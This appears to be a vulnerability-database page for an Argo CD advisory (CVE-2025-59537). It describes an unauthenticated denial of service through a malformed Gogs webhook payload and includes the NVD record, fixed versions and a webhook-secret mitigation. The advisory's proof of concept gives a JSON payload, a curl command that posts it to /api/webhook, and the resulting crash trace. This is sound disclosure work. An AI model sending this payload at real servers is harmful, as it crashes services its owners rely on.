    "GHSA-3wgm-2mw2-vh5m",
    "GHSA-4x4m-3c2p-qppc",
    "GHSA-6v2p-p543-phr9",
    "GHSA-92cp-5422-2m47",
    "GHSA-93mq-9ffx-83m2",
    "GHSA-f6x5-jh6r-wrfv",
    "GHSA-hj2p-8wj8-pfq4",
    "GHSA-j5w8-q4qc-rx2x",
    "GHSA-mh63-6h87-95cp",
    "GHSA-mw99-9chc-xw7r"
  ]
}

GHSA-WP4P-9PXH-CGX2

Vulnerability from github – Published: 2025-09-30 18:28 – Updated: 2025-10-23 20:22

Summary

argo-cd vulnerable unauthenticated DoS via malformed Gogs webhook payload

Details

Summary

Unpatched Argo CD versions are vulnerable to malicious API requests which can crash the API server and cause denial of service to legitimate clients.

With the default configuration, no webhook.gogs.secret set, Argo CD’s /api/webhook endpoint will crash the entire argocd-server process when it receives a Gogs push event whose JSON field commits[].repo is not set or is null.

Details

Users can access /api/webhook without authentication, and when accessing this endpoint, the Handler function parses webhook type messages according to the header (e.g. X-Gogs-Event) and body parameters provided by the user. The Parse function simply unmarshals JSON-type messages. In other words, it returns a data structure even if the data structure is not exactly matched.

The affectedRevisionInfo function parses data according to webhook event types(e.g. gogsclient.PushPayload). However, due to the lack of data structure validation corresponding to these events, an attacker can cause a Denial of Service (DoS) attack by sending maliciously crafted data. because of Repository is Pointer Type.

func affectedRevisionInfo(payloadIf any) (webURLs []string, revision string, change changeInfo, touchedHead bool, changedFiles []string) {
    switch payload := payloadIf.(type) {
        // ...
        case gogsclient.PushPayload:
            webURLs = append(webURLs, payload.Repo.HTMLURL) // bug
            // ...
        }
    return webURLs, revision, change, touchedHead, changedFiles
}

PoC

payload-gogs.json

{
  "ref": "refs/heads/master",
  "before": "0000000000000000000000000000000000000000",
  "after": "0a05129851238652bf806a400af89fa974ade739",
  "commits": [{}]
}

curl -k -v https://argocd.example.com/api/webhook \
  -H 'X-Gogs-Event: push' \
  -H 'Content-Type: application/json' \
  --data-binary @/tmp/payload-gogs.json

An attacker can cause a DoS and make the argo-cd service unavailable by continuously sending unauthenticated requests to /api/webhook.

panic: runtime error: invalid memory address or nil pointer dereference
[signal SIGSEGV: segmentation violation code=0x1 addr=0x68 pc=0x280f494]

goroutine 302 [running]:
github.com/argoproj/argo-cd/v2/util/webhook.affectedRevisionInfo({0x3bd8240?, 0x40005a7030?})
    /go/src/github.com/argoproj/argo-cd/util/webhook/webhook.go:233 +0x594
github.com/argoproj/argo-cd/v2/util/webhook.(*ArgoCDWebhookHandler).HandleEvent(0x40000f9140, {0x3bd8240?, 0x40005a7030?})
    /go/src/github.com/argoproj/argo-cd/util/webhook/webhook.go:254 +0x38
github.com/argoproj/argo-cd/v2/util/webhook.(*ArgoCDWebhookHandler).startWorkerPool.func1()
    /go/src/github.com/argoproj/argo-cd/util/webhook/webhook.go:128 +0x60
created by github.com/argoproj/argo-cd/v2/util/webhook.(*ArgoCDWebhookHandler).startWorkerPool in goroutine 1
    /go/src/github.com/argoproj/argo-cd/util/webhook/webhook.go:121 +0x28

Mitigation

If you use Gogs and need to handle webhook events, configure a webhook secret to ensure only trusted parties can invoke the webhook handler.

If you do not use Gogs, you can set the webhook secret to a long, random value to effectively disable webhook handling for Gogs payloads.

apiVersion: v1
kind: Secret
metadata:
  name: argocd-secret
type: Opaque
data:
+  webhook.gogs.secret: <your base64-encoded secret here>

For more information

Open an issue in the Argo CD issue tracker or discussions
Join us on Slack in channel #argo-cd

Credit

Sangjun Song (s0ngsari) at Theori (theori.io)

Severity ?

7.5 (High)


                  
                    CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/argoproj/argo-cd"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "1.2.0"
            },
            {
              "last_affected": "1.8.7"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 2.14.19"
      },
      "package": {
        "ecosystem": "Go",
        "name": "github.com/argoproj/argo-cd/v2"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "2.0.0-rc1"
            },
            {
              "fixed": "2.14.20"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/argoproj/argo-cd/v3"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "3.2.0-rc1"
            },
            {
              "fixed": "3.2.0-rc2"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ],
      "versions": [
        "3.2.0-rc1"
      ]
    },
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 3.1.7"
      },
      "package": {
        "ecosystem": "Go",
        "name": "github.com/argoproj/argo-cd/v3"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "3.1.0-rc1"
            },
            {
              "fixed": "3.1.8"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 3.0.18"
      },
      "package": {
        "ecosystem": "Go",
        "name": "github.com/argoproj/argo-cd/v3"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "3.0.0-rc1"
            },
            {
              "fixed": "3.0.19"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2025-59537"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-20",
      "CWE-476"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2025-09-30T18:28:38Z",
    "nvd_published_at": "2025-10-01T21:16:43Z",
    "severity": "HIGH"
  },
  "details": "### Summary\n\nUnpatched Argo CD versions are vulnerable to malicious API requests which can crash the API server and cause denial of service to legitimate clients. \n\nWith the default configuration, no `webhook.gogs.secret` set, Argo CD\u2019s /api/webhook endpoint will crash the entire argocd-server process when it receives a Gogs push event whose JSON field `commits[].repo` is not set or is null.\n\n### Details\n\nUsers can access `/api/webhook` without authentication, and when accessing this endpoint, the `Handler` function parses webhook type messages according to the `header (e.g. X-Gogs-Event)` and `body` parameters provided by the user. The `Parse` function simply unmarshals JSON-type messages. In other words, it returns a data structure even if the data structure is not exactly matched.\n\nThe `affectedRevisionInfo` function parses data according to webhook event types(e.g. `gogsclient.PushPayload`). However, due to the lack of data structure validation corresponding to these events, an attacker can cause a Denial of Service (DoS) attack by sending maliciously crafted data. because of Repository is Pointer Type.\n\n```go\nfunc affectedRevisionInfo(payloadIf any) (webURLs []string, revision string, change changeInfo, touchedHead bool, changedFiles []string) {\n    switch payload := payloadIf.(type) {\n        // ...\n        case gogsclient.PushPayload:\n            webURLs = append(webURLs, payload.Repo.HTMLURL) // bug\n            // ...\n        }\n    return webURLs, revision, change, touchedHead, changedFiles\n}\n\n```\n### PoC\n\npayload-gogs.json\n\n```json\n{\n  \"ref\": \"refs/heads/master\",\n  \"before\": \"0000000000000000000000000000000000000000\",\n  \"after\": \"0a05129851238652bf806a400af89fa974ade739\",\n  \"commits\": [{}]\n}\n```\n\n```shell\ncurl -k -v https://argocd.example.com/api/webhook \\\n  -H \u0027X-Gogs-Event: push\u0027 \\\n  -H \u0027Content-Type: application/json\u0027 \\\n  --data-binary @/tmp/payload-gogs.json\n```\n\nAn attacker can cause a DoS and make the argo-cd service unavailable by continuously sending unauthenticated requests to `/api/webhook`.\n\n```\npanic: runtime error: invalid memory address or nil pointer dereference\n[signal SIGSEGV: segmentation violation code=0x1 addr=0x68 pc=0x280f494]\n\ngoroutine 302 [running]:\ngithub.com/argoproj/argo-cd/v2/util/webhook.affectedRevisionInfo({0x3bd8240?, 0x40005a7030?})\n\t/go/src/github.com/argoproj/argo-cd/util/webhook/webhook.go:233 +0x594\ngithub.com/argoproj/argo-cd/v2/util/webhook.(*ArgoCDWebhookHandler).HandleEvent(0x40000f9140, {0x3bd8240?, 0x40005a7030?})\n\t/go/src/github.com/argoproj/argo-cd/util/webhook/webhook.go:254 +0x38\ngithub.com/argoproj/argo-cd/v2/util/webhook.(*ArgoCDWebhookHandler).startWorkerPool.func1()\n\t/go/src/github.com/argoproj/argo-cd/util/webhook/webhook.go:128 +0x60\ncreated by github.com/argoproj/argo-cd/v2/util/webhook.(*ArgoCDWebhookHandler).startWorkerPool in goroutine 1\n\t/go/src/github.com/argoproj/argo-cd/util/webhook/webhook.go:121 +0x28\n```\n\n### Mitigation\n\nIf you use Gogs and need to handle webhook events, configure a webhook secret to ensure only trusted parties can invoke the webhook handler.\n\nIf you do not use Gogs, you can set the webhook secret to a long, random value to effectively disable webhook handling for Gogs payloads.\n\n```diff\napiVersion: v1\nkind: Secret\nmetadata:\n  name: argocd-secret\ntype: Opaque\ndata:\n+  webhook.gogs.secret: \u003cyour base64-encoded secret here\u003e\n```\n\n### For more information\n\n* Open an issue in [the Argo CD issue tracker](https://github.com/argoproj/argo-cd/issues) or [discussions](https://github.com/argoproj/argo-cd/discussions)\n* Join us on [Slack](https://argoproj.github.io/community/join-slack) in channel #argo-cd\n\n### Credit\n\nSangjun Song (s0ngsari) at Theori (theori.io)",
  "id": "GHSA-wp4p-9pxh-cgx2",
  "modified": "2025-10-23T20:22:30Z",
  "published": "2025-09-30T18:28:38Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/argoproj/argo-cd/security/advisories/GHSA-wp4p-9pxh-cgx2"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-59537"
    },
    {
      "type": "WEB",
      "url": "https://github.com/argoproj/argo-cd/commit/761fc27068d2d4cd24e1f784eb2a9033b5ee7f43"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/argoproj/argo-cd"
    },
    {
      "type": "WEB",
      "url": "https://pkg.go.dev/vuln/GO-2025-39896"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "argo-cd vulnerable unauthenticated DoS via malformed Gogs webhook payload"
}

FKIE_CVE-2025-59537

Vulnerability from fkie_nvd - Published: 2025-10-01 21:16 - Updated: 2025-10-07 14:34

Severity ?

7.5 (High) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Summary

References

URL	Tags
security-advisories@github.com	https://github.com/argoproj/argo-cd/commit/761fc27068d2d4cd24e1f784eb2a9033b5ee7f43	Patch
security-advisories@github.com	https://github.com/argoproj/argo-cd/security/advisories/GHSA-wp4p-9pxh-cgx2	Exploit, Mitigation, Vendor Advisory
134c704f-9b21-4f2e-91b3-4a467353bcc0	https://github.com/argoproj/argo-cd/security/advisories/GHSA-wp4p-9pxh-cgx2	Exploit, Mitigation, Vendor Advisory

Impacted products

Vendor	Product	Version
argoproj	argo_cd	*
argoproj	argo_cd	*
argoproj	argo_cd	*
argoproj	argo_cd	*
argoproj	argo_cd	3.2.0

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:argoproj:argo_cd:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "CDA16487-4630-4646-9952-32E096B64251",
              "versionEndIncluding": "1.8.7",
              "versionStartIncluding": "1.2.0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:argoproj:argo_cd:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "FD4B38D5-4CEC-4C24-AD81-92B9DA4426AC",
              "versionEndExcluding": "2.14.20",
              "versionStartIncluding": "2.0.0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:argoproj:argo_cd:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "E7FEAEBF-40B8-40E4-B34B-2785B0FEAFEB",
              "versionEndExcluding": "3.0.19",
              "versionStartIncluding": "3.0.0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:argoproj:argo_cd:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "AFF4E847-D3D6-457A-A47B-98799D28E20E",
              "versionEndExcluding": "3.1.8",
              "versionStartIncluding": "3.1.0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:argoproj:argo_cd:3.2.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "247C0721-E494-4732-BF53-F249C574A702",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "Argo CD is a declarative, GitOps continuous delivery tool for Kubernetes. Versions 1.2.0 through 1.8.7, 2.0.0-rc1 through 2.14.19, 3.0.0-rc1 through 3.2.0-rc1, 3.1.7 and 3.0.18 are vulnerable to malicious API requests which can crash the API server and cause denial of service to legitimate clients. With the default configuration, no webhook.gogs.secret set, Argo CD\u2019s /api/webhook endpoint will crash the entire argocd-server process when it receives a Gogs push event whose JSON field commits[].repo is not set or is null. This issue is fixed in versions 2.14.20, 3.2.0-rc2, 3.1.8 and 3.0.19."
    }
  ],
  "id": "CVE-2025-59537",
  "lastModified": "2025-10-07T14:34:45.730",
  "metrics": {
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "HIGH",
          "baseScore": 7.5,
          "baseSeverity": "HIGH",
          "confidentialityImpact": "NONE",
          "integrityImpact": "NONE",
          "privilegesRequired": "NONE",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
          "version": "3.1"
        },
        "exploitabilityScore": 3.9,
        "impactScore": 3.6,
        "source": "security-advisories@github.com",
        "type": "Secondary"
      }
    ]
  },
  "published": "2025-10-01T21:16:43.577",
  "references": [
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Patch"
      ],
      "url": "https://github.com/argoproj/argo-cd/commit/761fc27068d2d4cd24e1f784eb2a9033b5ee7f43"
    },
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Exploit",
        "Mitigation",
        "Vendor Advisory"
      ],
      "url": "https://github.com/argoproj/argo-cd/security/advisories/GHSA-wp4p-9pxh-cgx2"
    },
    {
      "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
      "tags": [
        "Exploit",
        "Mitigation",
        "Vendor Advisory"
      ],
      "url": "https://github.com/argoproj/argo-cd/security/advisories/GHSA-wp4p-9pxh-cgx2"
    }
  ],
  "sourceIdentifier": "security-advisories@github.com",
  "vulnStatus": "Analyzed",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-20"
        },
        {
          "lang": "en",
          "value": "CWE-476"
        }
      ],
      "source": "security-advisories@github.com",
      "type": "Secondary"
    },
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-476"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

Sightings

Author	Source	Type	Date

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

CVE-2025-59537 (GCVE-0-2025-59537)

cleanstart-2026-cz81512

Vulnerability from cleanstart

cleanstart-2026-kz60560

Vulnerability from cleanstart

cleanstart-2026-jr48309

Vulnerability from cleanstart

cleanstart-2026-xr85161

Vulnerability from cleanstart

cleanstart-2026-wq07901

Vulnerability from cleanstart

GHSA-WP4P-9PXH-CGX2

Summary

Details

PoC

Mitigation

For more information

Credit

FKIE_CVE-2025-59537

Tags

Sightings

Nomenclature